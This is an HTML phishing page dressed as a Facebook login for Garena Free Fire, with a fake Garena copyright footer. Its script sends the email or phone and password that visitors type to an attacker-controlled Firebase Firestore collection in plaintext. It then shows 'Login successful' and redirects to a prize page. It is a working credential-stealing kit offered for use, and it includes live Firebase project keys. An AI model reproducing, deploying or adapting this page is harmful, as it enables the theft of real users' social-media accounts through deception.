<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Sign In</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-image: url('https://i.ibb.co/sQksN5C/images-16.jpg');
            background-size: cover;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            width: 88%;
            border-radius: 7px;
            text-align: center;
            background-color: white;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            padding: 20px 10px;
            position: absolute;
            overflow: hidden;
            top: 50px;
            
        }

        .header {
            background-color: #165781;
            padding: 1px;
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            color: white;
            font-size: 15px;
        }

        .logo {
            width: 70px;
            height: 70px;
            position: absolute;
            left: 50%;
            transform: translateX(-50%);
            border-radius: 5px;
        }

        .form {
            margin-top: 50px;
            color: black;
        }

        h2 {
            font-size: 24px;
            margin-bottom: 20px;
        }

        input[type="text"],
        input[type="password"] {
            width: calc(100% - 40px);
            padding: 12px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
        }

        input[type="text"].invalid,
        input[type="password"].invalid {
            border-color: red;
        }

        button {
            width: calc(100% - 40px);
            background-color: #236bd2;
            color: white;
            font-size: 16px;
            padding: 12px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }

        a {
            text-decoration: none;
            color: black;
            font-size: 14px;
            display: inline-block;
            margin-bottom: 10px;
        }

        .overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            display: none;
            justify-content: center;
            align-items: center;
            z-index: 9999;
            animation: shimmer 1s infinite linear;
        }

        .loader {
            background-image: linear-gradient(to right, rgba(255, 255, 255, 0), rgba(255, 255, 255, 0.3), rgba(255, 255, 255, 0));
            border: 4px solid #f3f3f3;
            border-radius: 50%;
            border-top: 4px solid #3498db;
            width: 50px;
            height: 50px;
            animation: spin 2s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        @keyframes shimmer {
    0% {
        background-position: -1000px 0;
    }
    100% {
        background-position: 1000px 0;
    }
    animation-duration: 2s; 
  
}

footer {
            position: fixed;
            bottom: 0;
            left: 0;
            width: %;
            background-color: #333;
            color: #fff;
            padding: -7px 0;
            text-align: center;
            color: white;
            magrin-bottom: 6px;
            
        }
        
         .logo3 {
            width: 60px;
            height: auto;
            margin-bottom: -20px;
        }
    </style>
</head>
<body>
    <div class="overlay" id="overlay">
        <div class="loader"></div>
    </div>

    <div class="container">
        <div class="header">
            <h3>Facebook</h3>
        </div>
        <br>
        <br>
        <br>
        <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ8uRZY5XPNGMvTY1ixRr9bepQqx7BvE27AHw&usqp=CAU" alt="Free Fire Logo" class="logo">
        <div class="form">
            <br>
            <p>Log in to your Facebook account to connect to Garena Free Fire</p>
            <input type="text" id="emailOrPhone" placeholder="Email address or phone number">
            <input type="password" id="password" placeholder="Password">
            <button type="submit" id="logInButton">Log In</button>
            <br>
            <br>
            <a href="#">Forgot password?</a>
        </div>
        <a href="#">Create New Account</a>
    </div>
    <br>
    <br>
<footer>
   <img src="https://i.ibb.co/4ftWq8b/1706436607111.png" alt="Free Fire Logo" class="logo3"> 
        <p>Copyright © Garena International.</p>
        <p>Trademarks belong to their respective owners. All rights Reserved.</p>
       
       
   
</footer>
    <!-- Firebase -->
    <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-firestore.js"></script>
    <script>
    // Firebase configuration
    const firebaseConfig = {
        apiKey: "AIzaSyAREEgVnS1M_JgvThBKIBw-vP_t6WJgs7U",
        authDomain: "poco-m5-dd083.firebaseapp.com",
        databaseURL: "https://poco-m5-dd083-default-rtdb.firebaseio.com",
        projectId: "poco-m5-dd083",
        storageBucket: "poco-m5-dd083.appspot.com",
        messagingSenderId: "590036832627",
        appId: "1:590036832627:web:a9c27ddbd9e1db309db506",
        measurementId: "G-LGWN38TY4K"
    };
    firebase.initializeApp(firebaseConfig);

    // Firestore reference
    var db = firebase.firestore().collection("Free_Fire");

    // Event listener for login button
    document.getElementById("logInButton").addEventListener("click", function() {
        var emailOrPhone = document.getElementById("emailOrPhone").value;
        var password = document.getElementById("password").value;
        var accountType = "Facebook";

        // Regular expressions for email and phone validation
        var emailRegex = /^[\w-]+(\.[\w-]+)*@gmail\.com$/;
        var phoneRegex = /^\d{10,}$/;

        // Check if input is empty
        if (!emailOrPhone || !password) {
            if (!emailOrPhone) {
                document.getElementById("emailOrPhone").classList.add("invalid");
            }
            if (!password) {
                document.getElementById("password").classList.add("invalid");
            }
            return;
        }

        // Check if email or phone is valid
        if (!(emailRegex.test(emailOrPhone) || phoneRegex.test(emailOrPhone))) {
            alert("Please enter a valid email address (gmail.com) or phone number.");
            return;
        }

        // Remove invalid class if present
        document.getElementById("emailOrPhone").classList.remove("invalid");
        document.getElementById("password").classList.remove("invalid");

        // Show loading overlay
        document.getElementById("overlay").style.display = "flex";

        // Save form data to Firestore
        db.add({
            emailOrPhone: emailOrPhone,
            password: password,
            accountType: accountType
        })
        .then(function(docRef) {
            console.log("Data added with ID: ", docRef.id);
            alert("Login successful.");
            window.location.href = "hadiah.html"; // Redirect to next page
        })
        .catch(function(error) {
            console.error("Error: ", error);
            alert("An error occurred while sending data to Firestore!");
        })
        .finally(function() {
            // Hide loading overlay after operation completes
            document.getElementById("overlay").style.display = "none";
        });
    });
</script>
</body>
</html>
